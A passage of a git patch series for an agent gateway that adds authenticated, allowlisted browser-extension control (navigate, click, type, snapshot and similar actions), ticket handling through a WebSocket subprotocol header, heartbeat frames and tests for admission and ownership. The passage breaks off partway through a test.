#: Phase 4 browser-extension control protocol version (advertised in #: /v1/capabilities and echoed in registration responses). _BROWSER_CONTROL_PROTOCOL_VERSION = 1 -#: Capabilities this phase actually grants a controller. Only the no-op -#: probe is real until the action protocol ships; any requested capability -#: outside this set is filtered out rather than advertised. -_BROWSER_CONTROL_CAPABILITIES = frozenset({"controller.noop"}) +#: Exact Phase 6 browser-extension action allowlist. Any requested capability +#: outside this set is filtered out rather than advertised or dispatched. +_BROWSER_CONTROL_CAPABILITIES = frozenset({ + "controller.noop", + "browser_back", + "browser_click", + "browser_navigate", + "browser_press", + "browser_screenshot", + "browser_scroll", + "browser_snapshot", + "browser_tab_activate", + "browser_tabs", + "browser_type", +}) _BROWSER_CONTROL_WS_PROTOCOL = "hermes-browser-control-v1" _BROWSER_CONTROL_TICKET_PROTOCOL_PREFIX = "hermes-browser-control-ticket." @@ -3256,16 +3267,14 @@ class APIServerAdapter(BasePlatformAdapter): "session_continuity_header": "X-Hermes-Session-Id", "session_key_header": "X-Hermes-Session-Key", "cors": bool(self._cors_origins), - # Phase 4 browser-extension control. Always advertised (so - # clients can feature-detect), but truthful: disabled until - # browser.extension_control.enabled is set, and Phase 4 - # exposes no real browser actions — only the no-op controller - # capability is ever granted. + # Browser-extension control is always advertised so clients + # can feature-detect it, but remains disabled until + # browser.extension_control.enabled is explicitly set. "browser_extension_control": { "enabled": self._browser_control_enabled(), "protocol_version": _BROWSER_CONTROL_PROTOCOL_VERSION, "capabilities": list(_BROWSER_CONTROL_CAPABILITIES), - "real_browser_actions": False, + "real_browser_actions": True, "transports": { "local_vps": "websocket-subprotocol-ticket", "cloud": "authenticated-gateway-rpc", @@ -3314,8 +3323,8 @@ class APIServerAdapter(BasePlatformAdapter): single-use ticket to open the controller WebSocket. Identity is NOT taken from the request body: the scope principal is derived server-side from the authenticated key/profile as a non-reversible - digest, and the capability set is filtered to what this phase - actually grants (``controller.noop``), so a spoofed + digest, and the capability set is filtered to the exact Phase 6 + action allowlist, so a spoofed ``principal_id`` or inflated capability list in the payload is ignored rather than honored. The named session must already exist in the active profile's server-owned SessionDB before a ticket is minted. @@ -3514,7 +3523,9 @@ class APIServerAdapter(BasePlatformAdapter): except Exception: continue if isinstance(frame, dict): - self._handle_browser_control_frame(scope, frame) + reply = self._handle_browser_control_frame(scope, frame) + if isinstance(reply, dict): + await ws.send_json(reply) elif msg.type in (web.WSMsgType.CLOSE, web.WSMsgType.ERROR): break finally: @@ -3531,6 +3542,17 @@ class APIServerAdapter(BasePlatformAdapter): params = frame.get("params") if not isinstance(params, dict): return + if method == "browser.controller.heartbeat": + nonce = str(params.get("nonce") or "").strip() + if not nonce or len(nonce) > 128: + return + # Echo only the caller's opaque nonce on the already authenticated, + # exact-scope controller socket. This proves the socket path is live + # without granting a new capability or touching broker commands. + return { + "method": "browser.controller.heartbeat", + "params": {"nonce": nonce, "ok": True}, + } if method == "browser.controller.result": command_id = params.get("command_id") if isinstance(command_id, str) and command_id: diff --git a/hermes_cli/web_server.py b/hermes_cli/web_server.py index 22dd7b56a1..a7dd5fe4b0 100644 --- a/hermes_cli/web_server.py +++ b/hermes_cli/web_server.py @@ -15961,6 +15961,26 @@ def _ws_auth_mode() -> str: return "loopback" +_GATEWAY_WS_PROTOCOL = "hermes-gateway-v1" +_GATEWAY_WS_TICKET_PROTOCOL_PREFIX = "hermes-gateway-ticket." + + +def _gateway_ws_ticket_from_subprotocol(ws: "WebSocket") -> tuple[str, str]: + """Return ``(ticket, reason)`` from an unambiguous gateway protocol set.""" + raw = str(ws.headers.get("sec-websocket-protocol", "") or "") + protocols = [value.strip() for value in raw.split(",") if value.strip()] + ticket_protocols = [ + value for value in protocols + if value.startswith(_GATEWAY_WS_TICKET_PROTOCOL_PREFIX) + ] + if not ticket_protocols: + return "", "none" + if _GATEWAY_WS_PROTOCOL not in protocols or len(ticket_protocols) != 1: + return "", "invalid" + ticket = ticket_protocols[0][len(_GATEWAY_WS_TICKET_PROTOCOL_PREFIX):] + return (ticket, "ok") if ticket else ("", "invalid") + + def _ws_auth_reason(ws: "WebSocket") -> tuple[Optional[str], str]: """Validate WS-upgrade auth; return ``(reason, credential)``. @@ -16030,7 +16050,10 @@ def _ws_auth_reason(ws: "WebSocket") -> tuple[Optional[str], str]: ) return "internal_invalid", "internal" - ticket = ws.query_params.get("ticket", "") + protocol_ticket, protocol_reason = _gateway_ws_ticket_from_subprotocol(ws) + if protocol_reason == "invalid": + return "ticket_invalid", "ticket-subprotocol" + ticket = protocol_ticket or ws.query_params.get("ticket", "") if not ticket: return "no_credential", "none" @@ -16047,6 +16070,12 @@ def _ws_auth_reason(ws: "WebSocket") -> tuple[Optional[str], str]: "user_id": info.get("user_id"), "provider": info.get("provider"), } + if protocol_ticket: + # Select only the stable public protocol during accept. The + # ticket-bearing protocol is a credential and must never be + # reflected back to the browser or retained after admission. + ws._hermes_ws_subprotocol = _GATEWAY_WS_PROTOCOL + return None, "ticket-subprotocol" return None, "ticket" except TicketInvalid as exc: audit_log( @@ -17171,7 +17200,11 @@ async def gateway_ws(ws: WebSocket) -> None: # onto the WS object by _ws_auth_reason; carry it into the gateway # transport where it becomes the identity authority for privileged RPCs # (browser.controller.register). None on the legacy token path. - await handle_ws(ws, auth_identity=getattr(ws, "_hermes_auth_identity", None)) + await handle_ws( + ws, + auth_identity=getattr(ws, "_hermes_auth_identity", None), + subprotocol=getattr(ws, "_hermes_ws_subprotocol", None), + ) # --------------------------------------------------------------------------- diff --git a/tests/gateway/test_browser_control_api.py b/tests/gateway/test_browser_control_api.py index d47d98e845..7421df2025 100644 --- a/tests/gateway/test_browser_control_api.py +++ b/tests/gateway/test_browser_control_api.py @@ -12,6 +12,18 @@ from gateway.platforms.api_server import APIServerAdapter API_KEY = "-".join(("fixture", "neutral", "api", "key", "123")) CONTROL_PROTOCOL = "hermes-browser-control-v1" +REAL_BROWSER_CAPABILITIES = { + "browser_back", + "browser_click", + "browser_navigate", + "browser_press", + "browser_screenshot", + "browser_scroll", + "browser_snapshot", + "browser_tab_activate", + "browser_tabs", + "browser_type", +} class _SessionDB: @@ -70,6 +82,33 @@ def _registration_body(**overrides): return payload +@pytest.mark.asyncio +async def test_phase6_registration_grants_only_the_exact_real_action_allowlist(monkeypatch): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + requested = [ + "controller.noop", + *sorted(REAL_BROWSER_CAPABILITIES), + "browser_cdp", + "browser_evaluate", + "browser_upload", + "arbitrary.capability", + ] + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.post( + "/v1/browser-control/register", + json=_registration_body(capabilities=requested), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + assert response.status == 201 + registration = await response.json() + + assert set(registration["scope"]["capabilities"]) == { + "controller.noop", + *REAL_BROWSER_CAPABILITIES, + } + + def test_route_table_advertises_registration_and_controller_ws_without_replacing_existing_routes(): adapter = _adapter() routes = {(method, path) for method, path, _handler in adapter._http_route_table()} @@ -112,15 +151,13 @@ async def test_capabilities_are_truthful_and_disabled_by_default(monkeypatch): data = await response.json() control = data["features"]["browser_extension_control"] - assert control == { - "enabled": False, - "protocol_version": 1, - "capabilities": ["controller.noop"], - "real_browser_actions": False, - "transports": { - "local_vps": "websocket-subprotocol-ticket", - "cloud": "authenticated-gateway-rpc", - }, + assert control["enabled"] is False + assert control["protocol_version"] == 1 + assert set(control["capabilities"]) == {"controller.noop", *REAL_BROWSER_CAPABILITIES} + assert control["real_browser_actions"] is True + assert control["transports"] == { + "local_vps": "websocket-subprotocol-ticket", + "cloud": "authenticated-gateway-rpc", } assert data["endpoints"]["browser_control_register"] == { "method": "POST", @@ -260,12 +297,26 @@ async def test_local_api_ticket_ws_noop_round_trip_filters_spoofed_identity_and_ assert registration["ws_path"] == "/v1/browser-control/ws" assert registration["scope"]["principal_id"] != "spoofed-client-principal" assert registration["scope"]["transport_family"] == "local-api" - assert registration["scope"]["capabilities"] == ["controller.noop"] + assert set(registration["scope"]["capabilities"]) == { + "controller.noop", + "browser_navigate", + } ws = await client.ws_connect( "/v1/browser-control/ws", protocols=[CONTROL_PROTOCOL, _ticket_protocol(registration["ticket"])], ) + await ws.send_json( + { + "method": "browser.controller.heartbeat", + "params": {"nonce": "heartbeat-api-fixture"}, + } + ) + heartbeat = await ws.receive_json(timeout=2.0) + assert heartbeat == { + "method": "browser.controller.heartbeat", + "params": {"nonce": "heartbeat-api-fixture", "ok": True}, + } scope = ControllerScope( principal_id=registration["scope"]["principal_id"], profile_id=registration["scope"]["profile_id"], diff --git a/tests/gateway/test_browser_control_cloud.py b/tests/gateway/test_browser_control_cloud.py index 0d40941045..6dee92f12c 100644 --- a/tests/gateway/test_browser_control_cloud.py +++ b/tests/gateway/test_browser_control_cloud.py @@ -14,6 +14,21 @@ from tui_gateway.methods_browser_control import _broker_event_writer, _principal def _fake_ticket_ws(ticket): return SimpleNamespace( query_params={"ticket": ticket}, + headers={}, + client=SimpleNamespace(host="203.0.113.7"), + url=SimpleNamespace(path="/api/ws"), + ) + + +def _fake_ticket_subprotocol_ws(ticket): + return SimpleNamespace( + query_params={}, + headers={ + "sec-websocket-protocol": ( + f"{web_server._GATEWAY_WS_PROTOCOL}, " + f"{web_server._GATEWAY_WS_TICKET_PROTOCOL_PREFIX}{ticket}" + ) + }, client=SimpleNamespace(host="203.0.113.7"), url=SimpleNamespace(path="/api/ws"), ) @@ -43,6 +58,19 @@ def test_dashboard_ticket_identity_is_carried_forward_without_trusting_rpc_param assert web_server._ws_auth_ok(_fake_ticket_ws(ticket)) is False +def test_dashboard_ticket_subprotocol_carries_the_same_server_identity(gated_dashboard): + _reset_for_tests() + ticket = mint_ticket(user_id="subprotocol-user", provider="provider-fixture") + ws = _fake_ticket_subprotocol_ws(ticket) + + assert web_server._ws_auth_ok(ws) is True + assert ws._hermes_auth_identity == { + "user_id": "subprotocol-user", + "provider": "provider-fixture", + } + assert ws._hermes_ws_subprotocol == web_server._GATEWAY_WS_PROTOCOL + + def test_ws_transport_records_only_server_authenticated_identity(): loop = SimpleNamespace() identity = {"user_id": "user-fixture", "provider": "provider-fixture"} @@ -216,6 +244,28 @@ def test_cloud_gateway_noop_round_trip_is_bound_to_ticket_identity_and_session_t transport_family="cloud-ticket-ws", ) assert scope is not None + heartbeat_response = server.dispatch( + { + "jsonrpc": "2.0", + "id": 42, + "method": "browser.controller.heartbeat", + "params": {"session_id": "session-fixture"}, + }, + transport, + ) + assert heartbeat_response["result"] == {"ok": True} + + foreign_transport = Transport() + foreign_heartbeat = server.dispatch( + { + "jsonrpc": "2.0", + "id": 43, + "method": "browser.controller.heartbeat", + "params": {"session_id": "session-fixture"}, + }, + foreign_transport, + ) + assert foreign_heartbeat["error"]["code"] == 4403 outcome = {} def dispatch_noop(): diff --git a/tests/hermes_cli/test_dashboard_auth_ws_auth.py b/tests/hermes_cli/test_dashboard_auth_ws_auth.py index 8d590c08a5..4814ca30ef 100644 --- a/tests/hermes_cli/test_dashboard_auth_ws_auth.py +++ b/tests/hermes_cli/test_dashboard_auth_ws_auth.py @@ -176,7 +176,13 @@ def insecure_explicit_host_app(): web_server.app.state.auth_required = prev_required -def _fake_ws(*, query: dict, client_host: str = "127.0.0.1", path: str = "/api/pty"): +def _fake_ws( + *, + query: dict, + client_host: str = "127.0.0.1", + path: str = "/api/pty", + protocols: tuple[str, ...] = (), +): """Build a stand-in for starlette.WebSocket good enough for _ws_auth_ok.""" class _QP: @@ -188,6 +194,7 @@ def _fake_ws(*, query: dict, client_host: str = "127.0.0.1", path: str = "/api/p return SimpleNamespace( query_params=_QP(query), + headers={"sec-websocket-protocol": ", ".join(protocols)} if protocols else {}, client=SimpleNamespace(host=client_host), url=SimpleNamespace(path=path), ) @@ -213,6 +220,45 @@ class TestWsAuthOkGated: # Single-use — second consumption fails. assert web_server._ws_auth_ok(ws_two) is False + def test_ticket_subprotocol_is_single_use_and_selects_only_the_public_protocol(self, gated_app): + ticket = mint_ticket(user_id="subprotocol-user", provider="stub") + protocols = ( + web_server._GATEWAY_WS_PROTOCOL, + f"{web_server._GATEWAY_WS_TICKET_PROTOCOL_PREFIX}{ticket}", + ) + ws_one = _fake_ws(query={}, path="/api/ws", protocols=protocols) + ws_two = _fake_ws(query={}, path="/api/ws", protocols=protocols) + + assert web_server._ws_auth_ok(ws_one) is True + assert ws_one._hermes_auth_identity == { + "user_id": "subprotocol-user", + "provider": "stub", + } + assert ws_one._hermes_ws_subprotocol == web_server._GATEWAY_WS_PROTOCOL + assert ticket not in ws_one._hermes_ws_subprotocol + assert web_server._ws_auth_ok(ws_two) is False + + def test_ticket_subprotocol_rejects_missing_public_protocol_or_ambiguous_tickets(self, gated_app): + first = mint_ticket(user_id="u1", provider="stub") + missing_public = _fake_ws( + query={}, + path="/api/ws", + protocols=(f"hermes-gateway-ticket.{first}",), + ) + assert web_server._ws_auth_ok(missing_public) is False + + second = mint_ticket(user_id="u2", provider="stub") + ambiguous = _fake_ws( + query={}, + path="/api/ws", + protocols=( + "hermes-gateway-v1", + f"hermes-gateway-ticket.{first}", + f"hermes-gateway-ticket.{second}", + ), + ) + assert web_server._ws_auth_ok(ambiguous) is False + def test_legacy_token_rejected_in_gated_mode(self, gated_app): """Critical: gated mode must NOT honour the legacy token path diff --git a/tui_gateway/methods_browser_control.py b/tui_gateway/methods_browser_control.py index ef0d7240ef..8ce1c53fba 100644 --- a/tui_gateway/methods_browser_control.py +++ b/tui_gateway/methods_browser_control.py @@ -303,6 +303,42 @@ def _( return _ok(rid, {"accepted": accepted}) +@method("browser.controller.heartbeat") +def _( + rid, + params: dict, + _family=_CLOUD_TRANSPORT_FAMILY, + _forbidden=_ERR_FORBIDDEN, + _identity_ok=_is_authenticated_identity, + _digest=_principal_digest, +) -> dict: + """Acknowledge a heartbeat only for this transport's attached controller.""" + from gateway import browser_control_broker + + transport = current_transport() + identity = getattr(transport, "auth_identity", None) + if not _identity_ok(identity): + return _err(rid, _forbidden, "authenticated controller identity required") + session_id = str(params.get("session_id") or "") + with _sessions_lock: + session = _sessions.get(session_id) + if session is None or session.get("transport") is not transport: + return _err(rid, _forbidden, "session is not owned by this transport") + + broker = browser_control_broker.get_browser_control_broker() + scope = broker.scope_for_session( + session_id=session_id, + principal_id=_digest(identity), + transport_family=_family, + ) + if scope is None: + return _err(rid, _forbidden, "no controller registered for this session") + controller = broker.select(scope, "controller.noop") + if controller is None or controller.owner is not transport: + return _err(rid, _forbidden, "controller is not owned by this transport") + return _ok(rid, {"ok": True}) + + def register(server) -> None: """Bind this module's handlers onto ``server``'s globals and registry.""" _registry.install(server) diff --git a/tui_gateway/ws.py b/tui_gateway/ws.py index 1f2c7b0316..5ac36b5676 100644 --- a/tui_gateway/ws.py +++ b/tui_gateway/ws.py @@ -292,7 +292,12 @@ def _disable_nagle(ws: Any) -> None: _log.debug("ws TCP_NODELAY skip: %s", exc) -async def handle_ws(ws: Any, *, auth_identity: dict | None = None) -> None: +async def handle_ws( + ws: Any, + *, + auth_identity: dict | None = None, + subprotocol: str | None = None, +) -> None: """Run one WebSocket session. Wire-compatible with ``tui_gateway.entry``. *auth_identity* is the server-minted ``{user_id, provider}`` recorded at @@ -311,7 +316,10 @@ async def handle_ws(ws: Any, *, auth_identity: dict | None = None) -> None: disconnect_reason = "not_connected" try: - await ws.accept() + if subprotocol: + await ws.accept(subprotocol=subprotocol) + else: + await ws.accept() disconnect_reason = "connected" # Push small streamed frames out immediately instead of letting Nagle # batch them — keeps the live token cadence intact for GUI clients. From d524cc9a16e13be42762984d21c1e4d19fbce24e Mon Sep 17 00:00:00 2001 From: abundantbeing Date: Thu, 13 Aug 2026 21:18:08 +0700 Subject: [PATCH 011/161] fix(browser): harden extension controller routing Keep extension control opt-in and preserve existing browser backends unless an exact server-bound controller is available. Centralize protocol and capability admission across API and dashboard transports, make selected-controller results authoritative, bypass stale availability caches only inside bound requests, and serialize structured results for the existing tool contract. Add a real browser_snapshot route-table/WebSocket E2E, strict admission and ownership regressions, public configuration and protocol documentation, and tests proving feature-off/no-controller compatibility. --- cli-config.yaml.example | 5 + gateway/browser_control_broker.py | 59 ++++++++- gateway/platforms/api_server.py | 62 ++++----- tests/gateway/test_browser_control_api.py | 91 ++++++++++++- tests/gateway/test_browser_control_cloud.py | 78 +++++++++-- tests/tools/test_browser_extension_router.py | 123 ++++++++++++++++++ .../test_browser_extension_router_wiring.py | 2 +- tools/browser_extension_router.py | 57 +++++++- tools/browser_tool.py | 52 ++++++-- tools/registry.py | 19 +++ tui_gateway/methods_browser_control.py | 42 +++--- tui_gateway/ws.py | 2 +- .../programmatic-integration.md | 7 + .../docs/user-guide/features/api-server.md | 69 ++++++++++ 14 files changed, 593 insertions(+), 75 deletions(-) diff --git a/cli-config.yaml.example b/cli-config.yaml.example index 472b7b98c3..5e1b325be9 100644 --- a/cli-config.yaml.example +++ b/cli-config.yaml.example @@ -488,6 +488,11 @@ browser: # Inactivity timeout in seconds - browser sessions are automatically closed # after this period of no activity between agent loops (default: 120 = 2 minutes) inactivity_timeout: 120 + # Let an authenticated browser extension register as the controller for an + # existing Hermes session. Disabled by default. Local API registration also + # requires the API server bearer key to be configured. + extension_control: + enabled: false # ============================================================================= # Tool Loop Guardrails diff --git a/gateway/browser_control_broker.py b/gateway/browser_control_broker.py index 98e5dcdb28..cba0df58d5 100644 --- a/gateway/browser_control_broker.py +++ b/gateway/browser_control_broker.py @@ -1,4 +1,4 @@ -"""Transport-neutral browser-control broker core (Phase 4). +"""Transport-neutral browser-control broker core. This module is the in-process heart of the browser-control feature: it binds an *identity-scoped controller* (the party that physically drives a browser) @@ -71,6 +71,50 @@ DEFAULT_TICKET_TTL = 30.0 #: Default wall time a dispatch waits for the controller to complete. DEFAULT_COMMAND_TIMEOUT = 30.0 +#: Current wire protocol version. Registration requires this exact integer; +#: booleans are rejected even though ``bool`` subclasses ``int`` in Python. +BROWSER_CONTROL_PROTOCOL_VERSION = 1 + +#: Exact controller capability contract shared by every transport. The broker +#: never accepts arbitrary browser methods: raw CDP, script evaluation, console +#: access, uploads, and other privileged surfaces remain outside this allowlist. +BROWSER_CONTROL_CAPABILITIES = frozenset( + { + "controller.noop", + "browser_back", + "browser_click", + "browser_navigate", + "browser_press", + "browser_screenshot", + "browser_scroll", + "browser_snapshot", + "browser_tab_activate", + "browser_tabs", + "browser_type", + } +) + + +def browser_control_protocol_supported(value: Any) -> bool: + """Return whether ``value`` names the exact supported wire version.""" + return type(value) is int and value == BROWSER_CONTROL_PROTOCOL_VERSION + + +def filter_browser_control_capabilities(value: Any) -> frozenset: + """Return the permitted subset of a JSON/RPC capability list. + + A malformed non-list value has no capabilities. Unknown or non-string + entries are ignored; registration rejects an empty returned set. + """ + if not isinstance(value, list): + return frozenset() + return frozenset( + capability + for capability in value + if isinstance(capability, str) + and capability in BROWSER_CONTROL_CAPABILITIES + ) + #: Wire method names for controller frames. Transport-neutral by contract: #: transports carry these envelopes verbatim. FRAME_COMMAND = "browser.controller.command" @@ -293,6 +337,17 @@ class BrowserControlBroker: return None return controller + def is_owner(self, scope: ControllerScope, owner: Any) -> bool: + """Return whether ``owner`` is the exact transport attached to ``scope``. + + Ownership is independent of capabilities. Transport handlers use this + for heartbeat and result admission so a least-privilege controller does + not need to request ``controller.noop`` merely to complete a real action. + """ + with self._lock: + controller = self._controllers.get(scope) + return controller is not None and controller.owner is owner + def detach( self, scope: ControllerScope, @@ -600,7 +655,7 @@ def get_browser_control_broker() -> BrowserControlBroker: def browser_control_enabled(config: Optional[dict] = None) -> bool: - """Return the explicit Phase 4 feature flag (disabled by default).""" + """Return the explicit browser-control feature flag (disabled by default).""" if config is None: try: from hermes_cli.config import load_config diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index 127fafd6b5..feed75afc5 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -77,24 +77,10 @@ _api_request_browser_control_transport_family: ContextVar[str] = ContextVar( "api_server_browser_control_transport_family", default="" ) -#: Phase 4 browser-extension control protocol version (advertised in -#: /v1/capabilities and echoed in registration responses). +#: Browser-extension control protocol version advertised in capabilities and +#: echoed in registration responses. Strict validation is centralized in the +#: broker's ``browser_control_protocol_supported`` helper. _BROWSER_CONTROL_PROTOCOL_VERSION = 1 -#: Exact Phase 6 browser-extension action allowlist. Any requested capability -#: outside this set is filtered out rather than advertised or dispatched. -_BROWSER_CONTROL_CAPABILITIES = frozenset({ - "controller.noop", - "browser_back", - "browser_click", - "browser_navigate", - "browser_press", - "browser_screenshot", - "browser_scroll", - "browser_snapshot", - "browser_tab_activate", - "browser_tabs", - "browser_type", -}) _BROWSER_CONTROL_WS_PROTOCOL = "hermes-browser-control-v1" _BROWSER_CONTROL_TICKET_PROTOCOL_PREFIX = "hermes-browser-control-ticket." @@ -123,8 +109,11 @@ from agent.redact import redact_sensitive_text from agent.interrupt_compat import request_hard_interrupt from gateway.readiness import collect_runtime_readiness from gateway.browser_control_broker import ( + BROWSER_CONTROL_CAPABILITIES, ControllerScope, TicketInvalid, + browser_control_protocol_supported, + filter_browser_control_capabilities, get_browser_control_broker, ) @@ -1526,9 +1515,8 @@ class APIServerAdapter(BasePlatformAdapter): # Shutdown counts this reservation so the request cannot slip through # the drain between its first await and _run_agent()/task registration. self._pending_agent_requests: int = 0 - # Phase 4 browser-control broker core: transport-neutral ticket / - # controller / command lifecycle shared with the dashboard Gateway - # transport. This adapter only maps HTTP registration and the + # Browser-control broker core: transport-neutral ticket, controller, + # and command lifecycle shared with the dashboard Gateway transport. This adapter only maps HTTP registration and the # controller WebSocket onto the broker; it owns no broker state. self._browser_control_broker = get_browser_control_broker() @@ -2130,7 +2118,7 @@ class APIServerAdapter(BasePlatformAdapter): ("GET", "/v1/models", self._handle_models), ("GET", "/api/model/options", self._handle_model_options), ("GET", "/v1/capabilities", self._handle_capabilities), - # Phase 4 authenticated browser-control surface: POST registration + # Authenticated browser-control surface: POST registration # mints a short-lived ticket; the controller then opens the WS with # that ticket. Both are gated on browser.extension_control.enabled # and API-key auth (see the handlers for the exact status ladder). @@ -3273,7 +3261,7 @@ class APIServerAdapter(BasePlatformAdapter): "browser_extension_control": { "enabled": self._browser_control_enabled(), "protocol_version": _BROWSER_CONTROL_PROTOCOL_VERSION, - "capabilities": list(_BROWSER_CONTROL_CAPABILITIES), + "capabilities": sorted(BROWSER_CONTROL_CAPABILITIES), "real_browser_actions": True, "transports": { "local_vps": "websocket-subprotocol-ticket", @@ -3312,7 +3300,7 @@ class APIServerAdapter(BasePlatformAdapter): }) # ------------------------------------------------------------------ - # Phase 4 browser-extension control (authenticated local/VPS API) + # Browser-extension control (authenticated local/VPS API) # ------------------------------------------------------------------ async def _handle_browser_control_register(self, request: "web.Request") -> "web.Response": @@ -3323,7 +3311,7 @@ class APIServerAdapter(BasePlatformAdapter): single-use ticket to open the controller WebSocket. Identity is NOT taken from the request body: the scope principal is derived server-side from the authenticated key/profile as a non-reversible - digest, and the capability set is filtered to the exact Phase 6 + digest, and the capability set is filtered to the shared browser action allowlist, so a spoofed ``principal_id`` or inflated capability list in the payload is ignored rather than honored. The named session must already exist in @@ -3369,6 +3357,15 @@ class APIServerAdapter(BasePlatformAdapter): _openai_error("Request body must be a JSON object."), status=400 ) + if not browser_control_protocol_supported(payload.get("protocol_version")): + return web.json_response( + _openai_error( + "Unsupported browser-control protocol version.", + code="browser_control_protocol_unsupported", + ), + status=400, + ) + controller_id = str(payload.get("controller_id") or "").strip() browser_profile_id = str(payload.get("browser_profile_id") or "").strip() session_id = str(payload.get("session_id") or "").strip() @@ -3402,12 +3399,17 @@ class APIServerAdapter(BasePlatformAdapter): ) profile = _api_request_profile.get() or "default" - capabilities = frozenset( - capability - for capability in payload.get("capabilities") or [] - if isinstance(capability, str) - and capability in _BROWSER_CONTROL_CAPABILITIES + capabilities = filter_browser_control_capabilities( + payload.get("capabilities") ) + if not capabilities: + return web.json_response( + _openai_error( + "At least one permitted browser-control capability is required.", + code="browser_control_no_capabilities", + ), + status=400, + ) scope = ControllerScope( principal_id=self._derive_browser_control_principal(profile), profile_id=profile, @@ -3571,7 +3573,7 @@ class APIServerAdapter(BasePlatformAdapter): self._browser_control_broker.cancel(scope, tool_call_id=tool_call_id) def _browser_control_enabled(self) -> bool: - """Phase 4 feature flag; False unless explicitly enabled. + """Feature flag; False unless explicitly enabled. Reads ``browser.extension_control.enabled`` from the global config (defaults to False). Tests monkeypatch this method directly to force diff --git a/tests/gateway/test_browser_control_api.py b/tests/gateway/test_browser_control_api.py index 7421df2025..cf70cb92fe 100644 --- a/tests/gateway/test_browser_control_api.py +++ b/tests/gateway/test_browser_control_api.py @@ -8,6 +8,7 @@ from aiohttp.test_utils import TestClient, TestServer from gateway.browser_control_broker import ControllerRejected, ControllerScope from gateway.config import PlatformConfig from gateway.platforms.api_server import APIServerAdapter +from tools.browser_extension_router import route_browser_tool API_KEY = "-".join(("fixture", "neutral", "api", "key", "123")) @@ -83,7 +84,7 @@ def _registration_body(**overrides): @pytest.mark.asyncio -async def test_phase6_registration_grants_only_the_exact_real_action_allowlist(monkeypatch): +async def test_registration_grants_only_the_exact_real_action_allowlist(monkeypatch): adapter = _adapter() monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) requested = [ @@ -109,6 +110,36 @@ async def test_phase6_registration_grants_only_the_exact_real_action_allowlist(m } +@pytest.mark.asyncio +@pytest.mark.parametrize( + ("overrides", "code"), + [ + ({"protocol_version": 2}, "browser_control_protocol_unsupported"), + ({"protocol_version": True}, "browser_control_protocol_unsupported"), + ({"capabilities": []}, "browser_control_no_capabilities"), + ( + {"capabilities": ["browser_cdp", "arbitrary.capability"]}, + "browser_control_no_capabilities", + ), + ], +) +async def test_registration_rejects_unsupported_protocol_or_empty_capability_intersection( + monkeypatch, overrides, code +): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.post( + "/v1/browser-control/register", + json=_registration_body(**overrides), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + body = await response.json() + + assert response.status == 400 + assert body["error"]["code"] == code + + def test_route_table_advertises_registration_and_controller_ws_without_replacing_existing_routes(): adapter = _adapter() routes = {(method, path) for method, path, _handler in adapter._http_route_table()} @@ -383,6 +414,64 @@ async def test_local_api_ticket_ws_noop_round_trip_filters_spoofed_identity_and_ assert replay.value.status == 401 +@pytest.mark.asyncio +async def test_real_browser_action_routes_through_controller_without_legacy_fallback(monkeypatch): + adapter = _adapter() + monkeypatch.setattr(adapter, "_browser_control_enabled", lambda: True) + async with TestClient(TestServer(_app(adapter))) as client: + response = await client.post( + "/v1/browser-control/register", + json=_registration_body(capabilities=["browser_snapshot"]), + headers={"Authorization": f"Bearer {API_KEY}"}, + ) + assert response.status == 201 + registration = await response.json() + ws = await client.ws_connect( + "/v1/browser-control/ws", + protocols=[CONTROL_PROTOCOL, _ticket_protocol(registration["ticket"])], + ) + + legacy_calls = [] + pending = asyncio.create_task( + asyncio.to_thread( + route_browser_tool, + "browser_snapshot", + {"include": "accessibility"}, + fallback=lambda: legacy_calls.append(True) or "legacy-result", + broker=adapter._browser_control_broker, + enabled=True, + session_id="session-fixture", + principal_id=registration["scope"]["principal_id"], + transport_family="local-api", + tool_call_id="tool-call-real-action", + ) + ) + command = await ws.receive_json(timeout=2.0) + assert command["method"] == "browser.controller.command" + assert command["params"]["action"] == "browser_snapshot" + assert command["params"]["arguments"] == {"include": "accessibility"} + await ws.send_json( + { + "method": "browser.controller.result", + "params": { + "command_id": command["params"]["command_id"], + "ok": True, + "result": { + "title": "Example Domain", + "url": "https://example.test/", + "refs": [], + }, + }, + } + ) + + assert await asyncio.wait_for(pending, timeout=2.0) == ( + '{"title": "Example Domain", "url": "https://example.test/", "refs": []}' + ) + assert legacy_calls == [] + await ws.close() + + @pytest.mark.asyncio async def test_remote_api_uses_the_same_authenticated_noop_round_trip(monkeypatch): adapter = _adapter() diff --git a/tests/gateway/test_browser_control_cloud.py b/tests/gateway/test_browser_control_cloud.py index 6dee92f12c..3b2561551d 100644 --- a/tests/gateway/test_browser_control_cloud.py +++ b/tests/gateway/test_browser_control_cloud.py @@ -3,7 +3,11 @@ from types import SimpleNamespace import pytest -from gateway.browser_control_broker import ControllerRejected, get_browser_control_broker +from gateway.browser_control_broker import ( + BROWSER_CONTROL_CAPABILITIES, + ControllerRejected, + get_browser_control_broker, +) from hermes_cli import web_server from hermes_cli.dashboard_auth.ws_tickets import _reset_for_tests, mint_ticket from tui_gateway import server @@ -173,7 +177,60 @@ def test_cloud_controller_registration_rejects_missing_or_internal_identity(monk server._sessions.pop("session-fixture", None) -def test_cloud_gateway_noop_round_trip_is_bound_to_ticket_identity_and_session_transport(monkeypatch): +@pytest.mark.parametrize( + "params", + [ + {"protocol_version": 2, "capabilities": ["browser_navigate"]}, + {"protocol_version": True, "capabilities": ["browser_navigate"]}, + { + "protocol_version": 1, + "capabilities": ["browser_cdp", "arbitrary.capability"], + }, + ], +) +def test_cloud_registration_rejects_unsupported_protocol_or_empty_capabilities( + monkeypatch, params +): + monkeypatch.setattr( + "gateway.browser_control_broker.browser_control_enabled", lambda: True + ) + + class Transport: + auth_identity = { + "user_id": "user-fixture", + "provider": "provider-fixture", + } + + def write(self, _frame): + return True + + transport = Transport() + server._sessions["registration-session-fixture"] = { + "transport": transport, + "session_key": "stored-registration-session", + "profile": "default", + } + try: + response = server.dispatch( + { + "jsonrpc": "2.0", + "id": 1, + "method": "browser.controller.register", + "params": { + "session_id": "registration-session-fixture", + "controller_id": "controller-fixture", + "browser_profile_id": "browser-profile-fixture", + **params, + }, + }, + 